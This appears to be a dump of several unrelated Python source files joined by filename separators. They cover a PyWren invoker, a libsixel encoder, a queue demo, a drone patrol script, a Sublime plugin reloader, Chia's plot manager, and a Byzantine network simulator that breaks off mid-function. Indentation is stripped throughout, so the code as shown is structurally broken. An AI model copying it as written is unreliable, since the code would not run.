# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import logging
import random
from types import SimpleNamespace
from multiprocessing import Process, Queue
from pywren_ibm_cloud.compute import Compute
from pywren_ibm_cloud.invoker import JobMonitor
from pywren_ibm_cloud.storage import InternalStorage
from pywren_ibm_cloud.version import __version__
from concurrent.futures import ThreadPoolExecutor
from pywren_ibm_cloud.config import cloud_logging_config, extract_compute_config, extract_storage_config
logging.getLogger('pika').setLevel(logging.CRITICAL)
logger = logging.getLogger('invoker')
def function_invoker(event):
if __version__ != event['pywren_version']:
raise Exception("WRONGVERSION", "PyWren version mismatch",
__version__, event['pywren_version'])
log_level = event['log_level']
cloud_logging_config(log_level)
log_level = logging.getLevelName(logger.getEffectiveLevel())
custom_env = {'PYWREN_FUNCTION': 'True',
'PYTHONUNBUFFERED': 'True',
'PYWREN_LOGLEVEL': log_level}
os.environ.update(custom_env)
config = event['config']
invoker = FunctionInvoker(config, log_level)
invoker.run(event['job_description'])
class FunctionInvoker:
"""
Module responsible to perform the invocations against the compute backend
"""
def __init__(self, config, log_level):
self.config = config
self.log_level = log_level
storage_config = extract_storage_config(self.config)
self.internal_storage = InternalStorage(storage_config)
compute_config = extract_compute_config(self.config)
self.remote_invoker = self.config['pywren'].get('remote_invoker', False)
self.rabbitmq_monitor = self.config['pywren'].get('rabbitmq_monitor', False)
if self.rabbitmq_monitor:
self.rabbit_amqp_url = self.config['rabbitmq'].get('amqp_url')
self.workers = self.config['pywren'].get('workers')
logger.debug('Total workers: {}'.format(self.workers))
self.compute_handlers = []
cb = compute_config['backend']
regions = compute_config[cb].get('region')
if regions and type(regions) == list:
for region in regions:
new_compute_config = compute_config.copy()
new_compute_config[cb]['region'] = region
self.compute_handlers.append(Compute(new_compute_config))
else:
self.compute_handlers.append(Compute(compute_config))
self.token_bucket_q = Queue()
self.pending_calls_q = Queue()
self.job_monitor = JobMonitor(self.config, self.internal_storage, self.token_bucket_q)
def _invoke(self, job, call_id):
"""
Method used to perform the actual invocation against the Compute Backend
"""
payload = {'config': self.config,
'log_level': self.log_level,
'func_key': job.func_key,
'data_key': job.data_key,
'extra_env': job.extra_env,
'execution_timeout': job.execution_timeout,
'data_byte_range': job.data_ranges[int(call_id)],
'executor_id': job.executor_id,
'job_id': job.job_id,
'call_id': call_id,
'host_submit_time': time.time(),
'pywren_version': __version__,
'runtime_name': job.runtime_name,
'runtime_memory': job.runtime_memory}
# do the invocation
start = time.time()
compute_handler = random.choice(self.compute_handlers)
activation_id = compute_handler.invoke(job.runtime_name, job.runtime_memory, payload)
roundtrip = time.time() - start
resp_time = format(round(roundtrip, 3), '.3f')
if not activation_id:
self.pending_calls_q.put((job, call_id))
return
logger.info('ExecutorID {} | JobID {} - Function invocation {} done! ({}s) - Activation'
' ID: {}'.format(job.executor_id, job.job_id, call_id, resp_time, activation_id))
return call_id
def run(self, job_description):
"""
Run a job described in job_description
"""
job = SimpleNamespace(**job_description)
log_msg = ('ExecutorID {} | JobID {} - Starting function invocation: {}() - Total: {} '
'activations'.format(job.executor_id, job.job_id, job.function_name, job.total_calls))
logger.info(log_msg)
self.total_calls = job.total_calls
for i in range(self.workers):
self.token_bucket_q.put('#')
for i in range(job.total_calls):
call_id = "{:05d}".format(i)
self.pending_calls_q.put((job, call_id))
self.job_monitor.start_job_monitoring(job)
invokers = []
for inv_id in range(4):
p = Process(target=self._run_process, args=(inv_id, ))
invokers.append(p)
p.daemon = True
p.start()
for p in invokers:
p.join()
def _run_process(self, inv_id):
"""
Run process that implements token bucket scheduling approach
"""
logger.info('Invoker process {} started'.format(inv_id))
call_futures = []
with ThreadPoolExecutor(max_workers=250) as executor:
# TODO: Change pending_calls_q check
while self.pending_calls_q.qsize() > 0:
self.token_bucket_q.get()
job, call_id = self.pending_calls_q.get()
future = executor.submit(self._invoke, job, call_id)
call_futures.append(future)
logger.info('Invoker process {} finished'.format(inv_id))
|
encoder.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-2016 Hayaki Saito
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from . import _sixel
from libsixel import *
class Encoder:
def __init__(self):
self._encoder = sixel_encoder_new()
def __del__(self):
sixel_encoder_unref(self._encoder)
def setopt(self, flag, arg=None):
sixel_encoder_setopt(self._encoder, flag, arg)
def encode(self, filename="-"):
sixel_encoder_encode(self._encoder, filename)
def encode_bytes(self, buf, width, height, pixelformat, palette):
sixel_encoder_encode_bytes(self._encoder, buf, width, height, pixelformat, palette)
def test(self, filename):
import threading
self.setopt(SIXEL_OPTFLAG_COLORS, 16)
self.setopt(SIXEL_OPTFLAG_DIFFUSION, "atkinson")
self.setopt(SIXEL_OPTFLAG_WIDTH, 200)
t = threading.Thread(target=self.encode, args=[filename])
t.daemon = True
t.start()
try:
while t.is_alive():
t.join(1)
except KeyboardInterrupt:
print("\033\\\033[Jcanceled.")
if __name__ == '__main__':
import sys
arg1 = "-" if len(sys.argv) < 2 else sys.argv[1]
Encoder().test(arg1)
|
run_second_thread.py
|
from queue import Queue
import threading
from time import sleep
def worker(batch_queue):
i = batch_queue.get()
while i is not None:
print('WORKER: I am worked on work {}'.format(i))
sleep(3)
i = batch_queue.get()
def upload(i, batch_queue):
print('This is {} work'.format(i))
batch_queue.put(i)
sleep(2)
if __name__ == "__main__":
# Создаем очередь для батчей загрузки в бд, ее будет разбирать отдельный тред
batch_queue = Queue()
upload_thread = threading.Thread(target=worker, args=(batch_queue,))
upload_thread.daemon = True
print('Start upload to db thread...')
upload_thread.start()
for i in range(10):
upload(i, batch_queue)
print('Кладем пустой batch, чтобы воркер понял, что пора завершаться')
batch_queue.put(None)
upload_thread.join()
|
test_ca.py
|
import numpy as np
import threading
from pycrazyswarm import *
from time import sleep, ctime
import scipy as sp
radii = 0.7
class Waypoint:
def __init__(self, agent, x, y, z, arrival, duration):
self.agent = agent
self.x = x
self.y = y
self.z = z
self.arrival = arrival
self.duration = duration
def __lt__(self, other):
return self.arrival < other.arrival
def __repr__(self):
return "Ag {} at {} s. [{}, {}, {}]".format(self.agent, self.arrival, self.x, self.y, self.z)
def load_waypoint(filepath):
# load csv file
data = np.loadtxt(filepath, skiprows=1, delimiter=',')
data[data[:, 0].argsort()]
# convert to internal data structure
waypoints = []
lastAgent = None
for row in data:
if lastAgent is None or lastAgent != row[0]:
lastTime = 0.0
waypoints.append(Waypoint(int(row[0]), row[1], row[2], row[3], row[4], row[4] - lastTime))
lastTime = row[4]
lastAgent = int(row[0])
# sort waypoints by arrival time
waypoints.sort()
return waypoints
def obstacle_avoidance(cfs, tello, radii):
while(1):
for cf in cfs:
dist = np.sqrt((cf.state.pos.x - tello.state.pos.x)**2 + (cf.state.pos.y - tello.state.pos.y)**2 + (cf.state.pos.z - tello.state.pos.z)**2)
if dist < radii:
pos = [cf.state.pos.x, cf.state.pos.y, cf.state.pos.z + 1.0]
cf.goTo(pos, 0, 1.0)
if __name__ == "__main__":
waypoints = load_waypoint("waypoints6.csv")
swarm = Crazyswarm()
timeHelper = swarm.timeHelper
allcfs = swarm.allcfs
cf6 = allcfs.crazyfliesById[7]
cf6.setLEDColor(1,0.5,0.5)
# collision avoidance
cfs = allcfs.crazyflies
cfs_ca = cfs[:-1]
other = cfs[-1]
thread_ca = threading.Thread(target = obstacle_avoidance, args = (cfs_ca, other, radii))
thread_ca.start()
# thread_ca.join()
# patrol
allcfs.takeoff(targetHeight=1.0, duration=2.0)
timeHelper.sleep(2.0)
lastTime = 0.0
while (1):
for waypoint in waypoints:
if waypoint.arrival == 0:
pos = [waypoint.x, waypoint.y, waypoint.z]
cf = allcfs.crazyfliesById[waypoint.agent]
cf.goTo(pos, 0, 2.0)
elif waypoint.duration > 0:
timeHelper.sleep(waypoint.arrival - lastTime)
lastTime = waypoint.arrival
pos = [waypoint.x, waypoint.y, waypoint.z]
cf = allcfs.crazyfliesById[waypoint.agent]
cf.goTo(pos, 0, waypoint.duration)
waypoint.arrival = waypoint.arrival + 20.0
# land
allcfs.land(targetHeight=0.02, duration=2.0)
timeHelper.sleep(2.0)
|
reload.py
|
import sublime
import sublime_plugin
import os
import posixpath
import threading
import builtins
import functools
import importlib
import sys
from inspect import ismodule
from contextlib import contextmanager
from .debug import StackMeter
try:
from package_control.package_manager import PackageManager
def is_dependency(pkg_name):
return PackageManager()._is_dependency(pkg_name)
except ImportError:
def is_dependency(pkg_name):
return False
def reload_plugin(verbose=True, then=None):
threading.Thread(
target=functools.partial(reload_package, 'GitSavvy', verbose=verbose, then=then)
).start()
def dprint(*args, fill=None, fill_width=60, **kwargs):
if fill is not None:
sep = str(kwargs.get('sep', ' '))
caption = sep.join(args)
args = "{0:{fill}<{width}}".format(caption and caption + sep,
fill=fill, width=fill_width),
print("[Package Reloader]", *args, **kwargs)
def path_contains(a, b):
return a == b or b.startswith(a + os.sep)
def get_package_modules(pkg_name):
in_installed_path = functools.partial(
path_contains,
os.path.join(
sublime.installed_packages_path(),
pkg_name + '.sublime-package'
)
)
in_package_path = functools.partial(
path_contains,
os.path.join(sublime.packages_path(), pkg_name)
)
def module_in_package(module):
file = getattr(module, '__file__', '')
paths = getattr(module, '__path__', ())
return (
in_installed_path(file) or any(map(in_installed_path, paths)) or
in_package_path(file) or any(map(in_package_path, paths))
)
return {
name: module
for name, module in sys.modules.items()
if module_in_package(module)
}
def package_plugins(pkg_name):
return [
pkg_name + '.' + posixpath.basename(posixpath.splitext(path)[0])
for path in sublime.find_resources("*.py")
if posixpath.dirname(path) == 'Packages/' + pkg_name
]
def reload_package(pkg_name, dummy=True, verbose=True, then=None):
if pkg_name not in sys.modules:
dprint("error:", pkg_name, "is not loaded.")
return
if is_dependency(pkg_name):
dependencies, packages = resolve_dependencies(pkg_name)
else:
dependencies = set()
packages = {pkg_name}
if verbose:
dprint("begin", fill='=')
all_modules = {
module_name: module
for pkg_name in dependencies | packages
for module_name, module in get_package_modules(pkg_name).items()
}
# Tell Sublime to unload plugins
for pkg_name in packages:
for plugin in package_plugins(pkg_name):
module = sys.modules.get(plugin)
if module:
sublime_plugin.unload_module(module)
# Unload modules
for module_name in all_modules:
sys.modules.pop(module_name)
# Reload packages
try:
with intercepting_imports(all_modules, verbose), importing_fromlist_aggresively(all_modules):
for pkg_name in packages:
for plugin in package_plugins(pkg_name):
sublime_plugin.reload_plugin(plugin)
except Exception:
dprint("reload failed.", fill='-')
reload_missing(all_modules, verbose)
raise
if dummy:
load_dummy(verbose)
if verbose:
dprint("end", fill='-')
if then:
then()
sublime.active_window().status_message('GitSavvy has 🙌 reloaded.')
def resolve_dependencies(root_name):
"""Given the name of a dependency, return all dependencies and packages
that require that dependency, directly or indirectly.
"""
manager = PackageManager()
all_packages = manager.list_packages()
all_dependencies = manager.list_dependencies()
recursive_dependencies = set()
dependent_packages = set()
dependency_relationships = {
name: manager.get_dependencies(name)
for name in all_packages + all_dependencies
}
def rec(name):
if name in recursive_dependencies:
return
recursive_dependencies.add(name)
for dep_name in all_dependencies:
if name in dependency_relationships[dep_name]:
rec(dep_name)
for pkg_name in all_packages:
if name in dependency_relationships[pkg_name]:
dependent_packages.add(pkg_name)
rec(root_name)
return (recursive_dependencies, dependent_packages)
def load_dummy(verbose):
"""
Hack to trigger automatic "reloading plugins".
This is needed to ensure TextCommand's and WindowCommand's are ready.
"""
if verbose:
dprint("installing dummy package")
dummy = "_dummy_package"
dummy_py = os.path.join(sublime.packages_path(), "%s.py" % dummy)
with open(dummy_py, "w"):
pass
def remove_dummy(trial=0):
if dummy in sys.modules:
if verbose:
dprint("removing dummy package")
try:
os.unlink(dummy_py)
except FileNotFoundError:
pass
after_remove_dummy()
elif trial < 300:
threading.Timer(0.1, lambda: remove_dummy(trial + 1)).start()
else:
try:
os.unlink(dummy_py)
except FileNotFoundError:
pass
condition = threading.Condition()
def after_remove_dummy(trial=0):
if dummy not in sys.modules:
condition.acquire()
condition.notify()
condition.release()
elif trial < 300:
threading.Timer(0.1, lambda: after_remove_dummy(trial + 1)).start()
threading.Timer(0.1, remove_dummy).start()
condition.acquire()
condition.wait(30) # 30 seconds should be enough for all regular usages
condition.release()
def reload_missing(modules, verbose):
missing_modules = {name: module for name, module in modules.items()
if name not in sys.modules}
if missing_modules:
if verbose:
dprint("reload missing modules")
for name in missing_modules:
if verbose:
dprint("reloading missing module", name)
sys.modules[name] = modules[name]
@contextmanager
def intercepting_imports(modules, verbose):
finder = FilterFinder(modules, verbose)
sys.meta_path.insert(0, finder)
try:
yield
finally:
if finder in sys.meta_path:
sys.meta_path.remove(finder)
@contextmanager
def importing_fromlist_aggresively(modules):
orig___import__ = builtins.__import__
@functools.wraps(orig___import__)
def __import__(name, globals=None, locals=None, fromlist=(), level=0):
module = orig___import__(name, globals, locals, fromlist, level)
if fromlist and module.__name__ in modules:
if '*' in fromlist:
fromlist = list(fromlist)
fromlist.remove('*')
fromlist.extend(getattr(module, '__all__', []))
for x in fromlist:
if ismodule(getattr(module, x, None)):
from_name = '{}.{}'.format(module.__name__, x)
if from_name in modules:
importlib.import_module(from_name)
return module
builtins.__import__ = __import__
try:
yield
finally:
builtins.__import__ = orig___import__
class FilterFinder:
def __init__(self, modules, verbose):
self._modules = modules
self._stack_meter = StackMeter()
self._verbose = verbose
def find_module(self, name, path=None):
if name in self._modules:
return self
def load_module(self, name):
module = self._modules[name]
sys.modules[name] = module # restore the module back
with self._stack_meter as depth:
if self._verbose:
dprint("reloading", ('| ' * depth) + '|--', name)
try:
return module.__loader__.load_module(name)
except Exception:
if name in sys.modules:
del sys.modules[name] # to indicate an error
raise
|
manager.py
|
from dataclasses import dataclass
import logging
import threading
import time
import traceback
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator
from concurrent.futures.thread import ThreadPoolExecutor
from blspy import G1Element
from chiapos import DiskProver
from chia.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size
from chia.plotting.util import (
PlotInfo,
PlotRefreshResult,
PlotsRefreshParameter,
PlotRefreshEvents,
get_plot_filenames,
parse_plot_info,
stream_plot_info_pk,
stream_plot_info_ph,
)
from chia.util.ints import uint16
from chia.util.path import mkdir
from chia.util.streamable import Streamable, streamable
from chia.types.blockchain_format.proof_of_space import ProofOfSpace
from chia.types.blockchain_format.sized_bytes import bytes32
from chia.wallet.derive_keys import master_sk_to_local_sk
log = logging.getLogger(__name__)
CURRENT_VERSION: uint16 = uint16(0)
@dataclass(frozen=True)
@streamable
class CacheEntry(Streamable):
pool_public_key: Optional[G1Element]
pool_contract_puzzle_hash: Optional[bytes32]
plot_public_key: G1Element
@dataclass(frozen=True)
@streamable
class DiskCache(Streamable):
version: uint16
data: List[Tuple[bytes32, CacheEntry]]
class Cache:
_changed: bool
_data: Dict[bytes32, CacheEntry]
def __init__(self, path: Path):
self._changed = False
self._data = {}
self._path = path
if not path.parent.exists():
mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
show_memo: bool
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
show_memo: bool = False,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.show_memo = show_memo
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
def batches() -> Iterator[Tuple[int, List[Path]]]:
if total_size > 0:
for batch_start in range(0, total_size, self.refresh_parameter.batch_size):
batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size)
yield total_size - batch_end, plot_paths[batch_start:batch_end]
else:
yield 0, []
for remaining, batch in batches():
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.removed += batch_result.removed
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {total_result.loaded}, "
f"total_result.removed {total_result.removed}, "
f"total_duration {total_result.duration:.2f} seconds"
)
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if not file_path.exists():
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded += 1
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
if self.show_memo:
plot_memo: bytes32
if pool_contract_puzzle_hash is None:
plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk)
else:
plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk)
plot_memo_str: str = plot_memo.hex()
log.info(f"Memo: {plot_memo_str}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
def plot_removed(test_path: Path):
return not test_path.exists() or test_path.parent not in plot_directories
with self.plot_filename_paths_lock:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if plot_removed(loaded_plot):
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
result.removed += 1
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
if plot_removed(Path(path) / Path(plot_filename)):
paths_to_remove.append(path)
result.removed += 1
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {result.loaded}, "
f"removed {result.removed}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
network.py
|
import imp
import time
import random
from node_stub import NodeStub
import asyncio
from threading import Thread, Lock
import queue
import sys
import logging
THREAD_COUNT = 10
STR_SEPARATOR = ','
class Task:
def __init__(self, node, function_name, args):
self.node = node
self.function_name = function_name
self.args = args
def __str__(self) -> str:
ret = self.node.get_pk() + STR_SEPARATOR + \
self.function_name + STR_SEPARATOR + str(self.args) + STR_SEPARATOR
for key in self.args:
ret += str(key) + ':' + str(self.args[key]) + STR_SEPARATOR
return ret
class NetworkMap:
def __init__(self, config, network_delay = 0, drop_ratio = 0, disable_primary = False, byzantine_node_cnt = 0) -> None:
self.config = config
self.lead_nodes = {}
self.client_nodes = {}
self.network_delay = network_delay
self.drop_ratio = drop_ratio
self.disable_primary = disable_primary
self._key_lock = Lock()
self._counter = dict()
self.tasks = queue.Queue()
self.stop = False
self.workers = []
self.byzantine_node_cnt = byzantine_node_cnt
self.current_byzantine_cnt = 0
for i in range(THREAD_COUNT):
worker = Thread(target=self.__send_events, daemon=True)
worker.start()
self.workers.append(worker)
def random_sleep(self):
if self.network_delay == 0:
return
time.sleep(random.randint(0, self.network_delay)/1000)
def set_network_delay(self, network_delay):
self.network_delay = network_delay
def register_lead(self, node, signature):
is_byzantine = random.randint(1, 3) == 2 and self.byzantine_node_cnt > self.current_byzantine_cnt
if is_byzantine:
self.current_byzantine_cnt += 1
signature.validate('aaa')
self.lead_nodes[signature.pk] = NodeStub(node, config=self.config, network_delay=self.network_delay, \
disable_primary = self.disable_primary, drop_ratio=self.drop_ratio, byzantine=is_byzantine)
def set_byzantine(self, key, new_value):
self.lead_nodes[key].set_byzantine(new_value)
def register_client(self, node, signature):
signature.validate('some data')
self.client_nodes[signature.pk] = node
def get_lead_nodes(self):
self.random_sleep()
return self.lead_nodes
def get_node(self, pk):
return self.client_nodes[pk] if pk in self.client_nodes else self.lead_nodes[pk]
def get_primary_for_view(self, new_view):
node_list = list(self.lead_nodes.values())
return node_list[new_view % len(node_list)]
# this helps when running synchronously
def get_shuffled_lead_nodes(self):
self.random_sleep()
shuffled_list = list(self.lead_nodes.values())
random.shuffle(shuffled_list)
return shuffled_list
def broadcast(self, function_name, args):
self._key_lock.acquire()
for node in self.get_shuffled_lead_nodes():
# exclude the sender.
signature = args['signature']
if signature.pk == node.get_pk():
continue
self.tasks.put(Task(node, function_name, args))
self._key_lock.release()
def send_to_node(self, node, function_name, args):
self._key_lock.acquire()
self.tasks.put(Task(node, function_name, args))
self._key_lock.release()
def send_to_primary_for_view(self, view, function_name, args):
node = self.get_primary_for_view(view)
self.send_to_node(node, function_name, args)
def __send_events(self):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while True:
if self.tasks.empty():
if self.is_shutdown():
sys.exit()
else:
time.sleep(2)
continue
